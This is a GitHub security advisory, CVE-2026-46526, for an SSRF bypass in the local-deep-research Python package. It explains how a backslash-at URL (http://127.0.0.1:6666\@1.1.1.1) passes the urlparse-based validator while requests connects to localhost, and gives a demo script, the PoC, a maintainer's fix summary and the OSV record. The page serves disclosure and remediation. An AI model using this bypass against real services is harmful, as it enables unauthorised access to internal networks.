GHSA-G23J-2VWM-5C25
Vulnerability from github – Published: 2026-05-28 19:18 – Updated: 2026-05-28 19:18Summary
The URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.
Details
The current project uses validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.
However, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in safe_get, validate_url is first used to perform an SSRF check, and then requests.get is used to send the actual request.
The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:
- urlparse() treats \ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as
1.1.1.1(public) - requests treats \ as a path character, connecting to
127.0.0.1(internal)
Below is a test code I wrote following the code.
#!/usr/bin/env python3
"""Standalone demo: import project via absolute path and call safe_get."""
from __future__ import annotations
import importlib.util
import enum
import sys
import types
from pathlib import Path
# Hardcoded absolute path to the project's "src" directory.
SRC_ROOT = Path(
r"d:\BaiduNetdiskDownload\local-deep-research-main\local-deep-research-main\src"
)
# Python 3.10 compatibility:
# project constants import StrEnum (available in Python 3.11+).
if not hasattr(enum, "StrEnum"):
class _CompatStrEnum(str, enum.Enum):
pass
enum.StrEnum = _CompatStrEnum # type: ignore[attr-defined]
def _load_safe_get():
"""Load safe_get directly from file, bypassing package __init__ imports."""
ldr_pkg_name = "local_deep_research"
security_pkg_name = "local_deep_research.security"
# Build lightweight package modules so relative imports in safe_requests.py
# resolve without executing package __init__.py files.
if ldr_pkg_name not in sys.modules:
ldr_pkg = types.ModuleType(ldr_pkg_name)
ldr_pkg.__path__ = [str(SRC_ROOT / "local_deep_research")] # type: ignore[attr-defined]
sys.modules[ldr_pkg_name] = ldr_pkg
if security_pkg_name not in sys.modules:
security_pkg = types.ModuleType(security_pkg_name)
security_pkg.__path__ = [str(SRC_ROOT / "local_deep_research" / "security")] # type: ignore[attr-defined]
sys.modules[security_pkg_name] = security_pkg
module_name = "local_deep_research.security.safe_requests"
module_path = SRC_ROOT / "local_deep_research" / "security" / "safe_requests.py"
spec = importlib.util.spec_from_file_location(module_name, module_path)
if spec is None or spec.loader is None:
raise ImportError(f"Cannot load module from {module_path}")
module = importlib.util.module_from_spec(spec)
sys.modules[module_name] = module
spec.loader.exec_module(module)
return module.safe_get
safe_get = _load_safe_get()
def main() -> None:
# Hardcoded URL for demonstration.
url = "http://127.0.0.1:6666"
# url = "http://127.0.0.1:6666\@1.1.1.1"
safe_get(url, timeout=15)
if __name__ == "__main__":
main()
When an attacker uses http://127.0.0.1:6666/, the existing detection logic can detect that this is an internal network address and block it.
However, when an attacker uses http://127.0.0.1:6666\@1.1.1.1, the detection logic resolves the host to 1.1.1.1, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to http://127.0.0.1:6666, bypassing the detection and achieving an SSRF attack.
PoC
http://127.0.0.1:6666\@1.1.1.1
Impact
SSRF
Maintainer note (2026-05-15)
Thanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation
spans four PRs, all merged to main and shipped in v1.6.10:
#3873 (merged 2026-05-08) — the load-bearing fix for the parser-differential
bypass:
- New RFC_FORBIDDEN_URL_CHARS_RE in security/ssrf_validator.py rejects
URLs containing backslash, ASCII control bytes, or whitespace — RFC 3986
forbids these and their presence signals a parser-differential attempt.
- Host extraction switched from urllib.parse.urlparse(url).hostname to
urllib3.util.parse_url(url).host. urllib3 is the parser requests
uses internally, so the validator and the HTTP client now agree on the
destination by construction — closing the \@ divergence that drove the
PoC.
- Same two-layer defence applied to NotificationURLValidator.validate_service_url.
- 53 new tests across test_ssrf_validator.py, test_notification_validator.py,
test_safe_requests.py, and test_ssrf_redirect_bypass.py, including the
advisory PoC http://127.0.0.1:6666\@1.1.1.1 and the post-prepare canonical
form http://127.0.0.1:6666/%5C@1.1.1.1.
#3882 (merged 2026-05-08) — hardens the metadata-IP block and redacts userinfo from log output so rejected URLs don't leak credentials to logs.
#3889 (merged 2026-05-09) — locks in real-world URL fixtures and behavior invariants from #3873/#3882 as regression tests.
#3932 (merged 2026-05-10) — blocks IPv6 transition prefixes (2002::/16
6to4, 64:ff9b::/96 NAT64, 2001::/32 Teredo, 100::/64 discard) so private
IPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an
operator opt-in (LDR_SECURITY_ALLOW_NAT64=true) for IPv6-only deployments,
but cloud metadata IPs remain blocked regardless.
Affected versions
- The specific parser-differential bypass described above exists from
v1.3.0 (when
validate_urlwas first introduced) through v1.6.9. The validator usedurlparse(url).hostnamefor that entire span. - Versions before v1.3.0 had no SSRF validator at all — requests went
directly to
requests.get()without any host check. Those versions are vulnerable to SSRF via this URL and any other internal address; the parser-differential trick is unnecessary.
In both cases the remediation is the same: upgrade to v1.6.10 or later.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "local-deep-research"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46526"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-28T19:18:34Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nThe URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.\n\n### Details\nThe current project uses `validate_url` to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.\n\n\u003cimg width=\"1173\" height=\"1107\" alt=\"QQ20260430-212334-30-1\" src=\"https://github.com/user-attachments/assets/52b356aa-9ad3-4b1d-a472-39a2ada3ea23\" /\u003e\n\nHowever, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in `safe_get`, `validate_url` is first used to perform an SSRF check, and then `requests.get` is used to send the actual request.\n\n\u003cimg width=\"1164\" height=\"1089\" alt=\"QQ20260430-212431-30-2\" src=\"https://github.com/user-attachments/assets/f3decb16-4daa-49e0-861c-273a913487a0\" /\u003e\n\nThe core issue: urlparse() and requests disagree on which host a URL like `http://127.0.0.1:6666\\@1.1.1.1` points to:\n\n- urlparse() treats \\ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as `1.1.1.1` (public)\n- requests treats \\ as a path character, connecting to `127.0.0.1` (internal)\n\nBelow is a test code I wrote following the code.\n```\n#!/usr/bin/env python3\n\"\"\"Standalone demo: import project via absolute path and call safe_get.\"\"\"\n\nfrom __future__ import annotations\n\nimport importlib.util\nimport enum\nimport sys\nimport types\nfrom pathlib import Path\n\n# Hardcoded absolute path to the project\u0027s \"src\" directory.\nSRC_ROOT = Path(\n r\"d:\\BaiduNetdiskDownload\\local-deep-research-main\\local-deep-research-main\\src\"\n)\n\n# Python 3.10 compatibility:\n# project constants import StrEnum (available in Python 3.11+).\nif not hasattr(enum, \"StrEnum\"):\n class _CompatStrEnum(str, enum.Enum):\n pass\n\n enum.StrEnum = _CompatStrEnum # type: ignore[attr-defined]\n\n\ndef _load_safe_get():\n \"\"\"Load safe_get directly from file, bypassing package __init__ imports.\"\"\"\n ldr_pkg_name = \"local_deep_research\"\n security_pkg_name = \"local_deep_research.security\"\n\n # Build lightweight package modules so relative imports in safe_requests.py\n # resolve without executing package __init__.py files.\n if ldr_pkg_name not in sys.modules:\n ldr_pkg = types.ModuleType(ldr_pkg_name)\n ldr_pkg.__path__ = [str(SRC_ROOT / \"local_deep_research\")] # type: ignore[attr-defined]\n sys.modules[ldr_pkg_name] = ldr_pkg\n\n if security_pkg_name not in sys.modules:\n security_pkg = types.ModuleType(security_pkg_name)\n security_pkg.__path__ = [str(SRC_ROOT / \"local_deep_research\" / \"security\")] # type: ignore[attr-defined]\n sys.modules[security_pkg_name] = security_pkg\n\n module_name = \"local_deep_research.security.safe_requests\"\n module_path = SRC_ROOT / \"local_deep_research\" / \"security\" / \"safe_requests.py\"\n\n spec = importlib.util.spec_from_file_location(module_name, module_path)\n if spec is None or spec.loader is None:\n raise ImportError(f\"Cannot load module from {module_path}\")\n\n module = importlib.util.module_from_spec(spec)\n sys.modules[module_name] = module\n spec.loader.exec_module(module)\n return module.safe_get\n\n\nsafe_get = _load_safe_get()\n\n\ndef main() -\u003e None:\n # Hardcoded URL for demonstration.\n url = \"http://127.0.0.1:6666\"\n # url = \"http://127.0.0.1:6666\\@1.1.1.1\"\n\n safe_get(url, timeout=15)\n\n\nif __name__ == \"__main__\":\n main()\n```\nWhen an attacker uses `http://127.0.0.1:6666/`, the existing detection logic can detect that this is an internal network address and block it.\n\n\u003cimg width=\"1694\" height=\"503\" alt=\"QQ20260430-212723-30-3\" src=\"https://github.com/user-attachments/assets/366f684d-9191-4acb-b6a2-b2c3c54f0223\" /\u003e\n\nHowever, when an attacker uses `http://127.0.0.1:6666\\@1.1.1.1`, the detection logic resolves the host to `1.1.1.1`, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to `http://127.0.0.1:6666`, bypassing the detection and achieving an SSRF attack.\n\n\u003cimg width=\"2424\" height=\"477\" alt=\"QQ20260430-212833-30-4\" src=\"https://github.com/user-attachments/assets/bd175e34-d833-44c5-981b-59cfad3406c3\" /\u003e\n\n### PoC\n```\nhttp://127.0.0.1:6666\\@1.1.1.1\n```\n\n### Impact\nSSRF\n\n\n\n---\n\n## Maintainer note (2026-05-15)\n\nThanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation\nspans four PRs, all merged to `main` and shipped in **v1.6.10**:\n\n**#3873** (merged 2026-05-08) \u2014 the load-bearing fix for the parser-differential\nbypass:\n- New `RFC_FORBIDDEN_URL_CHARS_RE` in `security/ssrf_validator.py` rejects\n URLs containing backslash, ASCII control bytes, or whitespace \u2014 RFC 3986\n forbids these and their presence signals a parser-differential attempt.\n- Host extraction switched from `urllib.parse.urlparse(url).hostname` to\n `urllib3.util.parse_url(url).host`. `urllib3` is the parser `requests`\n uses internally, so the validator and the HTTP client now agree on the\n destination by construction \u2014 closing the `\\@` divergence that drove the\n PoC.\n- Same two-layer defence applied to `NotificationURLValidator.validate_service_url`.\n- 53 new tests across `test_ssrf_validator.py`, `test_notification_validator.py`,\n `test_safe_requests.py`, and `test_ssrf_redirect_bypass.py`, including the\n advisory PoC `http://127.0.0.1:6666\\@1.1.1.1` and the post-prepare canonical\n form `http://127.0.0.1:6666/%5C@1.1.1.1`.\n\n**#3882** (merged 2026-05-08) \u2014 hardens the metadata-IP block and redacts\nuserinfo from log output so rejected URLs don\u0027t leak credentials to logs.\n\n**#3889** (merged 2026-05-09) \u2014 locks in real-world URL fixtures and behavior\ninvariants from #3873/#3882 as regression tests.\n\n**#3932** (merged 2026-05-10) \u2014 blocks IPv6 transition prefixes (`2002::/16`\n6to4, `64:ff9b::/96` NAT64, `2001::/32` Teredo, `100::/64` discard) so private\nIPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an\noperator opt-in (`LDR_SECURITY_ALLOW_NAT64=true`) for IPv6-only deployments,\nbut cloud metadata IPs remain blocked regardless.\n\n### Affected versions\n\n- **The specific parser-differential bypass** described above exists from\n **v1.3.0** (when `validate_url` was first introduced) through **v1.6.9**.\n The validator used `urlparse(url).hostname` for that entire span.\n- **Versions before v1.3.0** had no SSRF validator at all \u2014 requests went\n directly to `requests.get()` without any host check. Those versions are\n vulnerable to SSRF via this URL and any other internal address; the\n parser-differential trick is unnecessary.\n\nIn both cases the remediation is the same: **upgrade to v1.6.10 or later.**",
"id": "GHSA-g23j-2vwm-5c25",
"modified": "2026-05-28T19:18:35Z",
"published": "2026-05-28T19:18:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-g23j-2vwm-5c25"
},
{
"type": "PACKAGE",
"url": "https://github.com/LearningCircuit/local-deep-research"
},
{
"type": "WEB",
"url": "https://github.com/LearningCircuit/local-deep-research/releases/tag/v1.6.10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "local-deep-research has an SSRF bypass in `safe_get`"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.